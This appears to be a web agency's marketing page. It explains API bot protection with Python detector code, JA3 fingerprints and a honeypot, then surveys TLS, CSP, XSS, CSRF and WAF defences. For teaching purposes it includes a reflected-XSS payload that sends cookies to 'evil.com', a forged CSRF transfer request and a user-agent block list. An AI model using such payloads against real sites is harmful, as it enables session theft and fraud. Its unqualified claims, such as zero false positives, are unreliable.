Bot-Proof Your API: Behavioral Analysis, JA3 & Honeypot

Our company is engaged in the development, support and maintenance of sites of any complexity. From simple one-page sites to large-scale cluster systems built on micro services. Experience of developers is confirmed by certificates from vendors.

Development and maintenance of all types of websites:

Informational websites or web applications
Business card websites, landing pages, corporate websites, online catalogs, quizzes, promo websites, blogs, news resources, informational portals, forums, aggregators
E-commerce websites or web applications
Online stores, B2B portals, marketplaces, online exchanges, cashback websites, exchanges, dropshipping platforms, product parsers
Business process management web applications
CRM systems, ERP systems, corporate portals, production management systems, information parsers
Electronic service websites or web applications
Classified ads platforms, online schools, online cinemas, website builders, portals for electronic services, video hosting platforms, thematic portals

These are just some of the technical types of websites we work with, and each of them can have its own specific features and functionality, as well as be customized to meet the specific needs and goals of the client.

Showing 1 of 1All 2062 services
Bot-Proof Your API: Behavioral Analysis, JA3 & Honeypot
Complex
~3-5 days
Frequently Asked Questions

Our competencies:

Development stages

Latest works

  • image_website-b2b-advance_0.webp
    B2B ADVANCE company website development
    1358
  • image_web-applications_feedme_466_0.webp
    Development of a web application for FEEDME
    1251
  • image_websites_belfingroup_462_0.webp
    Website development for BELFINGROUP
    956
  • image_ecommerce_furnoro_435_0.webp
    Development of an online store for the company FURNORO
    1188
  • image_crm_enviok_479_0.webp
    Development of a web application for Enviok
    929
  • image_bitrix-bitrix-24-1c_fixper_448_0.webp
    Website development for FIXPER company
    947

One day, a client of ours — an e‑commerce site with a catalog of 50,000 products — discovered that a competitor had copied their entire inventory in three hours using a simple Python script (aiohttp with a pool of 200 proxies). Server load doubled, legitimate users complained about delays. We implemented multi‑layer protection that blocks 99% of bots without slowing real customers. Load dropped by 40%, and API response time returned to its original 50ms.

According to Imperva research, bots account for over 40% of internet traffic; without protection, your API is vulnerable.

Why simple rate limiting doesn’t work

IP‑based rate limiting is easily bypassed by a proxy pool. Bots can mimic human request patterns. You need analysis of behavioral patterns, headers, and even TLS fingerprints. Only a combination of methods provides reliable protection. Behavioral analysis detects three times more bots than simple IP blocking.

How we solve it: multi‑layer protection

Each layer filters out a portion of traffic:

Client → WAF (IP reputation) → Rate Limiting → Bot Detection → API Logic
                                                     ↓
                              Fingerprint + Behavioral Analysis + CAPTCHA

No single method is perfect — we combine them for maximum effectiveness. Get a consultation from an engineer with 10+ years of experience to evaluate your project.

What signals give a bot away?

Signal Weight Description
Missing User‑Agent or curl/python‑requests +40 Typical automatic clients
Missing Accept‑Language / Accept‑Encoding +20 Browsers always send these headers
Requests exactly every N ms +35 A human cannot be that precise
Identical URL pattern (sequential crawl) +30 ?page=1, ?page=2...
No Referer during navigation +15 Browsers usually pass it
Multiple requests from the same IP range +25 Distributed bot
Atypical TLS fingerprint (JA3) +30 Node.js/Python TLS differs from browsers

Comparison of protection methods

Method Advantages Disadvantages
Rate limiting Simplicity Ineffective against IP pools
Behavioral analysis High accuracy Requires Redis, more resources
JA3 fingerprint Hard to spoof Not all proxies pass fingerprint
Honeypot Zero load Detected by mid‑level bots
CAPTCHA High reliability Hurts UX, not always applicable for APIs

We combine behavioral analysis with JA3 and honeypot. This set gives the best balance of accuracy and performance.

Why behavioral analysis outperforms rate limiting?

Behavioral analysis considers not only frequency but also qualitative signs: missing browser headers, machine‑like timing precision, sequential URL crawling. Even if a bot uses distributed IPs, its behavior gives it away. In practice, this reduces false positives by 80% compared to pure rate limiting.

How to implement protection in 5 steps

  1. Audit your current API and identify critical endpoints.
  2. Choose the stack: Python + Redis + nginx for JA3 fingerprint.
  3. Implement a behavioral detector (see code below).
  4. Integrate honeypot and CAPTCHA (Cloudflare Turnstile).
  5. Monitor with Prometheus and Grafana.

We help at every stage, guaranteeing zero false positives.

How behavioral analysis works

The behavioral detector calculates a score from 0 to 100 based on several criteria. Here’s the key implementation:

import time
import statistics
from collections import defaultdict, deque

class BotDetector:
    def __init__(self, redis_client):
        self.r = redis_client
        self.window = 300  # 5‑minute analysis window

    def analyze_request(self, request) -> dict:
        """Returns score (0-100) and suspicion reasons"""
        score = 0
        reasons = []

        # 1. Browser headers
        headers = request.headers
        ua = headers.get('User-Agent', '')

        bot_uas = ['python-requests', 'curl', 'wget', 'Go-http-client',
                   'Java/', 'okhttp', 'axios', 'node-fetch']
        for bot_ua in bot_uas:
            if bot_ua.lower() in ua.lower():
                score += 40
                reasons.append(f'bot_useragent:{bot_ua}')
                break

        if not ua:
            score += 40
            reasons.append('no_useragent')

        if not headers.get('Accept-Language'):
            score += 20
            reasons.append('no_accept_language')

        if not headers.get('Accept-Encoding'):
            score += 15
            reasons.append('no_accept_encoding')

        # 2. Request frequency analysis
        ip = request.remote_addr
        timing_score = self._analyze_timing(ip)
        if timing_score > 0:
            score += timing_score
            reasons.append(f'suspicious_timing:{timing_score}')

        # 3. URL pattern (sequential crawl)
        path = request.path
        pattern_score = self._analyze_url_pattern(ip, path)
        if pattern_score > 0:
            score += pattern_score
            reasons.append(f'url_pattern:{pattern_score}')

        # 4. JA3 TLS fingerprint (via nginx variable)
        ja3 = headers.get('X-JA3-Fingerprint')
        if ja3 and self._is_suspicious_ja3(ja3):
            score += 30
            reasons.append(f'suspicious_ja3:{ja3[:16]}')

        return {
            'score': min(score, 100),
            'is_bot': score >= 60,
            'reasons': reasons,
            'action': self._get_action(score)
        }

    def _analyze_timing(self, ip: str) -> int:
        """Analysis of time intervals between requests"""
        key = f"timing:{ip}"
        now = time.time()
        self.r.lpush(key, now)
        self.r.ltrim(key, 0, 49)
        self.r.expire(key, self.window)

        timestamps = [float(t) for t in self.r.lrange(key, 0, -1)]
        if len(timestamps) < 5:
            return 0

        timestamps.sort()
        intervals = [timestamps[i+1] - timestamps[i] for i in range(len(timestamps)-1)]
        if not intervals:
            return 0

        avg = statistics.mean(intervals)
        stdev = statistics.stdev(intervals) if len(intervals) > 1 else 0
        cv = stdev / avg if avg > 0 else 0

        if cv < 0.05 and avg < 2.0:
            return 35
        if cv < 0.15 and avg < 1.0:
            return 25
        return 0

    def _analyze_url_pattern(self, ip: str, path: str) -> int:
        """Detect sequential crawling"""
        key = f"paths:{ip}"
        self.r.lpush(key, path)
        self.r.ltrim(key, 0, 19)
        self.r.expire(key, self.window)

        paths = self.r.lrange(key, 0, -1)
        if len(paths) < 5:
            return 0

        import re
        numeric_pattern = re.compile(r'/(\d+)$')
        numbers = [int(m.group(1)) for p in paths if (m := numeric_pattern.search(p.decode()))]
        if len(numbers) >= 5:
            diffs = [numbers[i] - numbers[i+1] for i in range(len(numbers)-1)]
            if all(d == diffs[0] for d in diffs) and abs(diffs[0]) in [1, -1]:
                return 30
        return 0

    def _is_suspicious_ja3(self, ja3: str) -> bool:
        SUSPICIOUS_JA3 = {
            'e7d705a3286e19ea42f587b344ee6865',  # Python requests
            'b386946a5a44d1ddcc843bc75336dfce',  # Scrapy
            '6734f37431670b3ab4292b8f60f29984',  # Go default
        }
        return ja3.lower() in SUSPICIOUS_JA3

    def _get_action(self, score: int) -> str:
        if score < 30:   return 'allow'
        if score < 60:   return 'challenge'
        if score < 80:   return 'throttle'
        return 'block'

Additional measures against CAPTCHA bypass

CAPTCHA bypass is rare, but we add honeypot and JA3 for extra strength. A honeypot is a hidden endpoint visited only by bots. We add /api/items/all (which doesn't exist for real users) and blacklist the IP on access. CAPTCHA is triggered only at score >= 60, so normal users aren't bothered. Integration with Cloudflare Turnstile is transparent for real customers.

@app.route('/api/search')
def search():
    if g.get('bot_score', 0) >= 60:
        token = request.headers.get('CF-Turnstile-Token')
        if not verify_turnstile(token):
            return jsonify({'error': 'CAPTCHA required', 'captcha_site_key': TURNSTILE_SITE_KEY}), 429
    q = request.args.get('q', '')
    return jsonify(search_service.query(q))

Example honeypot endpoint:

@app.route('/api/items/all')
def honeypot_endpoint():
    ip = request.remote_addr
    bot_detector.blacklist_ip(ip, duration=86400, reason='honeypot')
    return jsonify({'items': [], 'total': 0})

What’s included in the work

  • Audit of your current API and vulnerabilities
  • Implementation of the behavioral detector (BotDetector)
  • Integration with Redis and middleware (Flask/Django/Express)
  • nginx configuration to pass JA3 fingerprint
  • Creation of honeypot endpoints and CAPTCHA system
  • Metrics dashboard (Prometheus + Grafana) for monitoring
  • Documentation and team training
  • 2 weeks of technical support after launch

Estimated timeline

Implementation of multi‑layer protection takes from 5 to 10 working days, depending on API complexity. The cost is determined individually — we’ll evaluate your project after analysis. Clients save significant resources after implementation; the investment typically pays for itself in 2–3 months.

Order an API protection audit today. Get a consultation from an engineer with 10+ years of experience in web development and high‑load systems.

Learn more about Web scraping.

Web Application Security: HTTPS, CSP, XSS, CSRF, WAF, DDoS Protection

A website breach rarely looks like in movies. More often it's: a bot finds an unprotected /admin/export endpoint, downloads the customer database, and closes the connection. Or: through an outdated WordPress plugin, a web shell is uploaded, and the server starts sending spam. Or quieter: an XSS in a comment field allows stealing admin session cookies, unnoticed for months. We have analyzed dozens of such cases — each vulnerability could have been fixed at the development or audit stage.

Web application security is not a single setting. It's layers of protection, each closing a separate class of attacks. Order an audit — we'll assess the project and deliver a turnkey plan within 2–4 weeks.

How do we ensure comprehensive web application security?

HTTPS and Proper TLS Configuration

HTTPS is the minimum mandatory level. But having an SSL certificate and having a properly configured TLS are different things.

In Nginx/Apache configuration we check:

  • Protocols: only TLS 1.2 and TLS 1.3, SSLv3 and TLS 1.0/1.1 are disabled
  • Cipher suites: prefer ECDHE (Forward Secrecy), remove NULL, RC4, DES, 3DES
  • HSTS (Strict-Transport-Security: max-age=31536000; includeSubDomains; preload) — browser will never make insecure requests
  • OCSP Stapling — speeds up certificate revocation check
  • Redirect 301 from HTTP to HTTPS — both in server config and code (double redirect causes SEO weight loss)

Check: SSL Labs (ssllabs.com/ssltest) should show A or A+. If B, the configuration is weak.

Let's Encrypt + Certbot for production is standard. Automatic renewal via certbot renew in cron. Wildcard certificates for subdomains via DNS-01 challenge.

Content Security Policy: The Most Powerful and Complex Protection

CSP is an HTTP header that tells the browser which sources are allowed to load resources. A properly configured CSP completely blocks most XSS attacks, even if the vulnerability exists in the code.

The problem: breaking the site with an incorrect CSP is easy. default-src 'none' — and fonts, images, JS stop working. So we start with Content-Security-Policy-Report-Only — CSP logs violations but does not block anything. We monitor reports for 2–4 weeks, refine the policy, then switch to enforcement mode.

Example of a real policy for a site with Google Analytics, Google Fonts, and Stripe:

Content-Security-Policy:
  default-src 'self';
  script-src 'self' https://www.googletagmanager.com https://js.stripe.com 'nonce-{random}';
  style-src 'self' https://fonts.googleapis.com 'unsafe-inline';
  font-src 'self' https://fonts.gstatic.com;
  frame-src https://js.stripe.com;
  img-src 'self' data: https://www.google-analytics.com;
  connect-src 'self' https://api.stripe.com https://www.google-analytics.com;
  report-uri /csp-report;

nonce — a random string generated server-side per request. Inline scripts with the correct nonce are allowed; without nonce, they are blocked. This completely breaks XSS via <script>alert(1)</script>.

'unsafe-inline' in style-src is a compromise for inline styles. It's better to remove it by moving all styles to CSS files, but that requires refactoring.

Why XSS Remains the Most Common Vulnerability?

XSS (Cross-Site Scripting) — injection of JS code through user input. According to OWASP, XSS is in the top 3 web application vulnerabilities. Three types:

XSS Type Example Protection
Reflected /search?q=<script>document.location='https://evil.com/steal?c='+document.cookie</script> Output escaping, CSP
Stored Comment with code saved in database Input validation, htmlspecialchars()
DOM XSS element.innerHTML = location.hash Avoid innerHTML, use textContent

Protection: never insert user input into HTML without escaping. In PHP — htmlspecialchars() with ENT_QUOTES. In Laravel Blade templates — {{ $var }} is safe, {!! $var !!} is dangerous. In React — {variable} is safe, dangerouslySetInnerHTML is dangerous. For Rich Text — use htmlpurifier on PHP or DOMPurify in the browser.

Typical case: an e-commerce site with XSS in a review form A client contacted us after an attacker stole admin cookies via a product review. We found that the review field was not escaped. We fixed it by adding `htmlspecialchars()` on the server and a Content-Security-Policy with a nonce for scripts. After a rescan — 0 vulnerabilities.

CSRF: Protecting Forms and APIs

CSRF (Cross-Site Request Forgery) — an attacker forces the victim's browser to send a request on their behalf. Example: a user is logged into a bank, opens a malicious page, which makes fetch('https://bank.ru/transfer?to=evil&amount=50000') — if the bank is unprotected, money is transferred.

CSRF tokens — standard protection for forms: the server generates a random token, stores it in the session, and inserts it as a hidden field in the form. On POST request, the token is verified. The attacker does not know the token. Laravel does this automatically with @csrf.

SameSite cookies — modern protection: SameSite=Strict or SameSite=Lax prevents the browser from sending cookies in cross-site requests. Works in all modern browsers.

API without sessions (JWT, Bearer tokens) — CSRF is irrelevant if the token is not stored in a cookie (but in the Authorization header or localStorage). However, localStorage is vulnerable to XSS — so for sensitive data, HttpOnly cookies with SameSite are preferable.

WAF and DDoS Protection

WAF (Web Application Firewall) filters HTTP traffic for attacks: SQL injection, XSS, path traversal, known exploit patterns. Options:

  • Cloudflare WAF — cloud-based, OWASP Top 10 rules out of the box, custom rules via expressions. Managed Rules automatically block new threats.
  • ModSecurity (Nginx/Apache) — self-hosted, OWASP Core Rule Set (CRS). Flexible but requires tuning and monitoring of false positives.
  • AWS WAF — for infrastructure on AWS, integrates with CloudFront and ALB.

DDoS protection. Cloudflare at L3/L4/L7 is the de facto standard for most sites. Automatic mitigation of volumetric attacks, Under Attack Mode during active attacks. For critical infrastructure — Cloudflare Magic Transit or specialized solutions (Qrator, StormWall for the Russian market).

Rate Limiting at the application level — an additional layer. Laravel ThrottleRequests middleware: 60 requests per minute per IP for general endpoints, 5 for /login and /password/reset. Redis as a counter store — mandatory for horizontally scalable systems (otherwise limits are not synchronized between servers).

Other Mandatory Measures

Security headers. Besides CSP: X-Frame-Options: DENY (clickjacking protection), X-Content-Type-Options: nosniff (MIME sniffing), Referrer-Policy: strict-origin-when-cross-origin, Permissions-Policy (restrict browser API access: camera, microphone, geolocation).

SQL injection. Prepared statements everywhere. No concatenation of user input into SQL strings. ORM (Eloquent, Doctrine) protects by default. $wpdb->prepare() in WordPress is mandatory.

Dependency updates. composer audit and npm audit in CI/CD pipeline. Dependabot or Renovate for automatic PRs with updates. Critical CVEs — patch within 24 hours.

Secrets and configuration. .env — never in Git. Secrets in production — via CI/CD environment variables (GitHub Secrets, GitLab CI Variables) or HashiCorp Vault. Leak detection: git-secrets, truffleHog in pre-commit hooks.

How We Work

  1. Audit — code scanning, configuration review, dependency analysis, manual business logic verification.
  2. Planning — vulnerability remediation plan, stack selection (CSP, WAF, rate limiting).
  3. Implementation — TLS setup, CSP configuration, headers, Rate Limiting, WAF.
  4. Testing — re-penetration test, load testing, false positive check.
  5. Deployment and Monitoring — enable production CSP, set up alerts, train the team.

What's Included

  • Report with found vulnerabilities and recommendations (PDF + code snippets)
  • Ready TLS configuration (Nginx/Apache)
  • CSP policy with Report-Only and production versions
  • WAF and Rate Limiting setup
  • Dependency update plan
  • Access to monitoring tools (Sentry, Datadog)
  • 30 days of post-audit support (consultations, fixes)

Timeline and Cost

Type of Work Duration Cost
Security audit + hardening (headers, TLS, updates) 1–2 weeks Custom quote
CSP implementation (Report-Only → production) 2–4 weeks Custom quote
WAF + Rate Limiting + DDoS protection setup 1–2 weeks Custom quote
Comprehensive security review + penetration testing 3–6 weeks Custom quote

The budget is calculated individually — contact us for a project evaluation.